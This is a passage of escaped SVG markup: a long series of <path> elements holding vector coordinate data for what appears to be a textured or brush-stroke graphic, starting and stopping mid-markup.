d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n        <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n        <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n        <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n        <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n        <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n        <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n        <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n        <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n        <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n        <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n        <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n        <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n        <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n        <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n        <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n        <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n        <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n        <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n        <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n        <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n        <path 